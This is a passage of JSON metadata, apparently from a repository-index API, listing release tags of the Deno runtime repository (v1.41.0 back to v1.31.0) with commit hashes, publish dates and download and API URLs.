manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a